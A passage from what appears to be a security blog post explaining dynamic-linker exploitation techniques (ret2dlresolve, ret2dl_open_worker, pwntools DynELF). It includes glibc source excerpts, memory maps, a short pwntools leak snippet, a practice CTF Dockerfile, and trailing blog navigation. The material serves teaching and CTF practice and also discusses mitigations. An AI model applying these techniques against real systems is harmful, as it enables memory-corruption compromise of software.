Those are trivial to construct in the above example. With the first and second primitive we can write fake relocation, symbol and string table entries, e.g., to the .bss section. We can furthermore arrange for the fake relocation entry to reference the fake symbol, and for the fake symbol to reference the fake string, by computing their offsets from the real symbol and string tables, respectively. The third and fourth primitive can then be used to place a suitably chosen reloc_arg on the stack before returning to the DL stub in the PLT. The DL will lookup our symbol and jump right to it. This can be used to call any function exported by any library dependency of the program (and any of their dependencies), i.e., the global scope. In particular, we do not need to leak library base addresses or care about the library version present on the system. You can find code to exploit the target binary here. Since that is a lot of boilerplate code, pwntools provides a helper class to automate the generation of the payload.

However, there is a problem with this technique: Remember that the symbol index in the relocation entry is also used to lookup version information for the symbol in another table?

if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0){ // [1]
    const struct r_found_version *version = NULL;

    if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL){ // [2]
        const ElfW(Half) *vernum =
	        (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
        ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff; // [3]
	version = &l->l_versions[ndx]; // [4]
	if (version->hash == 0) // [5]
	    version = NULL;
    }
(snip)
} else {
    // value = l->l_addr + sym->value
    value = DL_FIXUP_MAKE_VALUE (l, SYMBOL_ADDRESS (l, sym, true)); // [6]
    result = l;
}

Since the entry sizes of the version and symbol tables are very different (0x16 and 0x2 bytes) these reads might lead to unpredictable results.

The first two entries of the array at l->l_versions that we access at [4] are always zero. Thus, depending on the binary, we may be able to place our fake symbol such that the read at [3] returns either zero or one. In that case the condition [5] is true. Otherwise, we may fail due to version mismatches or a segmentation fault.

Examining system binaries on Ubuntu and Arch shows that the compiler usually places the .dynsym and .gnu.version sections next to each other in the read only segment preceding the program text.

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
...
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000003538 0x0000000000003538  R      0x1000
...
 Section to Segment mapping:
  Segment Sections...
...
   02     .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt
...

Thus, a fake symbol in the read write data after the text will not segfault (since segments are continuous in memory) and there is a chance that ndx points to a zero symbol. However, a fake symbol on the heap will almost certainly segfault since the read falls into the unmapped region above the program image and below the heap.

Start              End                Offset             Perm Path
0x0055dc04929000 0x0055dc0492d000 0x00000000000000 r-- /usr/bin/ls
...
0x0055dc0494d000 0x0055dc0494e000 0x00000000023000 rw- /usr/bin/ls
0x0055dc0494e000 0x0055dc0494f000 0x00000000000000 rw-
0x0055dc065b2000 0x0055dc065d3000 0x00000000000000 rw- [heap]

In case this becomes a problem, one can modify the link map to disable version checking (making the comparison [2] fail), or fake the whole link map re-using an existing GOT entry as l_addr. The latter approach also requires writing the offset between the used GOT function and the target function into st_value of the fake symbol and forcing the visibility check [1] to fail so we do not start to traverse the link map list but rather use the local definition in [4], where l->l_addr is the hijacked got entry and sym->value is the offset in our fake symbol.

All of the above is really nothing new, in fact, the idea was described in a Phrack article from 2001 (!). Over time, the glibc developers added quite some code to make heap exploitation harder, see, e.g., safe linking for a recent example. So why does the relevant DL code still essentially looks it did 20 years ago? Can you “harden” glibc to “fix” this exploitation technique? All the information needed to add the “missing” bounds checks is available in the binary. To be concrete, the dynamic section’s DT_PLTRELSZ can be combined with DT_RELAENT and DT_PLTREL to bounds check the reloc_arg. Furthermore, DT_STRSZ can be used to check accesses to the string table. However, probably it shouldn’t be patched: If an attacker has the required primitives the party is already over in a realistic scenario, so there is no point in attempting defense-in-depth (my opinion). Furthermore, RELRO or DL_BIND_NOW already mitigate this exploitation technique.

ret2dl_open_worker

But what if we are not satisfied with the symbols defined in the global namespace? What if our exploit needs some functionality that is painful to implement in a ROP chain but is readily available in a library that is present on the system? If the program imports libdl we can use ret2dlresolve to call dlopen with the RTLD_GLOBAL flag, and afterwards use the same technique to call functions in the newly loaded library (no need to go through the hassle of fiddling with handles and dlsym in a ROP chain). But what if libdl is not available? In that case we can use our primitives to fake a struct dl_open_args and return directly to dl_open_worker. You can find code to load an arbitrary library to call any function in it here.

To use this in a ROP exploit, we need the address of dl_open_worker. One way would be to calculate it by leaking the address of _dl_runtime_resolve saved in the third GOT entry, this, however, requires access to the DL binary of the target system. The technique described in the next section provides an universal way to obtain this information given our primitives.

DynELF

During exploitation, we often use concrete bugs to construct generic primitives. Second stage techniques can then build upon those primitives to achieve more complex goals. For example, the the pwnlib Python library (from pwntools) provides an abstraction for an arbitrary read primitive. In order to use it, we need to implement a function that can leak one or more bytes at any given address, and then wrap it with the MemLeak class. This class implements caching and various convenience functions for the handling of types. (Aside: the pwnlib automatically creates a MemoryLeak instance one we have constructed a FmtString class from a format string bug.) In our example we could construct such a function by adding a second fake relocation that resolves to the write symbol. (You can find the source code to create a MemLeak instance here.)

On top of this abstraction the pwnlib implements the DynELF API, which provides methods for resolving addresses of arbitrary symbols in the remote process or dumping any dynamic object present in its address space. However, if we attempt to use it in our current example, we will immediately segfault the process. To understand why, we need to dig a bit deeper into the implementation. On a high-level, it can be split into two parts: getting a foothold in the remote process’ memory and mimicking _dl_lookup_symbol (with a few shortcuts).

In the constructor the class tries to leverage some valid pointer, which we need to provide, to find the list of link_map objects. There are two places in the program image where we can find this piece on information: the second GOT entry and when following the pointer to the r_debug symbol that the DL writes to the DT_DEBUG entry in the dynamic segment. Both can be found by first inferring the base address, which is done programmatically by looking for the ELF magic on page boundaries starting from any pointer to the image, and then parsing the program headers to find the dynamic segment. From there on, the address of the GOT or r_debug structure are readily inferred. This approach works for pointers into the program image as well as any shared object (note: shared objects have no DT_DEBUG entry). Exercise: With a slight adjustment, it should also be possible to extend the class to notice when the pointer is into the DL itself, e.g., look how the kernel infers if an ELF file is an interpreter. Then you could pivot to another technique, e.g., locating the _rtld_global symbol, which also holds a pointer to the program’s link map. Furthermore, it should be possible to implement an algorithm that finds the link map given some valid stack address: locate the stack base by finding the argv[0] string, educated guess needed, on a page boundary and then parsing the auxiliary vector to find either be binary’s entry point or the DL’s base.

Once the link map list is found, the resolution of symbols is really just a re-implementation of DL internals (note: there some neat optimizations like a fast path for libc that attempts to leak the build id of the remote library, downloads it, and then does the lookup locally).

Back to the reason why we looked into the source code: Currently we segfault the process during the DynELF constructor since our primitive is leaking 0x1337 bytes at a time, which causes us to access invalid memory when reading the GOT. To circumvent this problem, we can prime MemLeak’s cache with targeted reads before constructing the object, and again before using functionality that parses the link maps. (Here, leaker is a MemLeak instance.)

(snip)
# pre fill cache to avoid segfault
leaker._leak(binary.address, 1)                       # cache ELF and program headers
leaker._leak(binary.got.read - 0x1337, 0x1337)        # cache dynamic and GOT
dynelf = pwnlib.dynelf.DynELF(leaker, binary.address) # now save to use, parses GOT
leaker._leak(dynelf.link_map - 0x550, 1)                 # cache all the link maps
# get remote libc
libc = dynelf.libc                                    # now save to use, parses link maps
(snip)

Now that we have libc we are free to do what we want, e.g., constructing a more stable read primitive and dumping the remote DL to prepare a ret2dl_open_worker attack.

CTF

To practice all of the techniques described in this post, you can try the CTF challenge defined by the following Dockerfile:

FROM (???) AS builder
RUN (???)
WORKDIR /opt/ctf
COPY libabe.c ./
COPY Makefile ./
COPY poc.c ./
COPY ynetd ./
RUN make poc && make libabe.so
RUN patchelf --set-interpreter '/ld-linux-x86-64.so.2' --set-rpath '/' poc
RUN patchelf --set-interpreter '/ld-linux-x86-64.so.2' --set-rpath '/' ynetd
RUN patchelf --set-interpreter '/ld-linux-x86-64.so.2' --set-rpath '/' libabe.so

FROM scratch
COPY --from=builder /opt/ctf/poc /
COPY --from=builder /opt/ctf/libabe.so /
COPY --from=builder /opt/ctf/ynetd /
COPY --from=builder /usr/lib/ld-linux-x86-64.so.2 /
COPY --from=builder /usr/lib/libc.so.6 /
EXPOSE 1024
CMD ["/ynetd","-sh","n","-p","1024","poc"]

You managed to obtain the poc binary, but have no clue whatsoever about the libc in the remote container. However, it looks like libabe.so exposes a useful function.

# readelf -s libabe.so

Symbol table '.dynsym' contains 8 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
(snip)
     3: 000000000000105c    22 FUNC    GLOBAL DEFAULT   10 winner
(snip)

There are of course many ways to solve this problem, however, I think that combining the three techniques described above is certainly not the worst one.

0xeb9f

BPF Memory Forensics with Volatility 3

The BPF Subsystem

BPF Malware

Volatility Plugins

Listing Programs, Maps & Links

Live System

Memory Image

LSM Hooks

Networking Hooks

Finding Processes

Connecting the Dots

Case Study

Testing

Related Work

Conclusion

Appendix

A: Kernel Configuration

Solving Binary Gecko’s Hexacon CTF with frida and angr [stage 1, Linux]

Overview

Anti-Debug Vol. 1

Anti-Debug Vol. 2

Anti-Debug Vol. 3

Anti-Debug Vol. 4

Change of Strategy

Conclusion

Linux S1E3: With IP Control or Arbitrary Read-Write to Root

Process Isolation

Seccomp

Namespaces

Linux Security Modules (LSM)

Privilege Escalation

Development Setup

ROP Chain

Read-Write

Final Exploit

Mitigations

Conclusions

References

Linux S1E2: From UAF in km32 to IP Control or Arbitrary Read-Write

Causing a More Powerful UAF

Abusing Fake C++ for Stack Pivots

Abusing |’s for Arbitrary Read and Write

Kernel Address Space Layout Randomization (KASLR) Revisited

Finding our Task Struct

Wrap Up

References

Linux S1E1: From Off-by-Null to Kernel Pointer Leaks

Where to Start?

The Single Most Important Thing

Exploring the Challenge

SLUB Cash Course

SLUB Exploitation Crash Course

Constructing an Arbitrary Free Primitive

Exploiting the Arbitrary Free

Wrap Up

References

LSMs Jmp’ing on BPF Trampolines

Linux Security Modules

Modern BPF

Kernel Runtime Security Instrumentation (KRSI)

Fileless Executions

Self-Deletion

BPF Trampolines: The glue between C and BPF

Reaching the tramp

The Tramp

Digging Through Memory Dumps

Wrapup

References

ret2dlresolve: Exploiting with the Dynamic Linker

Program Startup

Loading

Interpretation

Program Runtime

Layz Linking

Loading Shared Objects

Exploitation

Startup - LPEs, Malware & Rootkits

Runtime - ret2dlresolve, ret2dl_open_worker & DynELF

ret2dlresolve